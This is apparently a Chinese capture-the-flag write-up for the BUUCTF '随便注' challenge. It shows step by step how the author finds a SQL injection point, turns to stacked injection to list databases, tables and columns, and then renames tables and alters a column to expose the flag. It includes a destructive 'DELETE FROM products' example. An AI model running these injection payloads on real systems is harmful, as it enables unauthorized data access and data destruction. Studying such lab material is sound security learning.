buuctf 随便注 writeup

1.0 打开页面

显然这个题的考点是注入，那我们来测一下

2.0 sql注入测试

1

2

输入 1' 后发现没有回显，改为 1' --+ 后，有回显，应该在这存在注入点

试一下 1' and 1=1 --+ 有一条回显

我们再改一下1' and 1=2 --+ 发现已经没有回显了

再试1' or 1=1 --+ 返回所有记录

正常sql注入流程order by走起，猜测为2个字段1' order by 2 --+

再测1' order by 3 --+他说没有字段3

既然测的字段有2个，联合查询union select 走起 1' union select 1, 2 --+

发现它把大部分的关键字过滤掉了，哦，有自己tcl，超出自己的知识范围了，所以找了一下dalao的wp，发现了新的知识堆叠注入，再此学习一波

3.0 堆叠注入

在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个
想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者
union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输
入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过
滤）Select * from products where productid=1;DELETE FROM products当执行查询后，第一
条显示查询信息，第二条则将整个表进行删除。

简单理解就是多条sql语句堆在一起执行，执行的语句类型没有限制

准备在写一篇堆叠注入当作笔记，记一下，现在大概知道了这个东西，就跟着wp试一下

试一下1'; show databases; --+ 看看效果，发现不仅查询1的记录，还进行的数据库的查询

在试一下数据表1'; show tables; --+发现数据表有2个

在试一下两张数据表里面都有什么字段'; show columns from words; --+

再试一下 0';show columns from `1919810931114514`; --+ 发现我们想要的flag字段在表1919810931114514中

4.0 骚姿势--改名字

在这学到了，两个骚姿势，alert和rename 既然它没有过滤这两个关键字，那是不是可以给表改名啊

1. 先把words -> word1
2. 再把1919810931114514 -> words
3. 最后把1919810931114514表中的flag字段改为id

payload: 1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;alter table `words` change `flag` `id` varchar(100) character set utf8 collate utf8_general_ci not null;show columns from words;--+

再用1' or 1=1 --+查看发现flag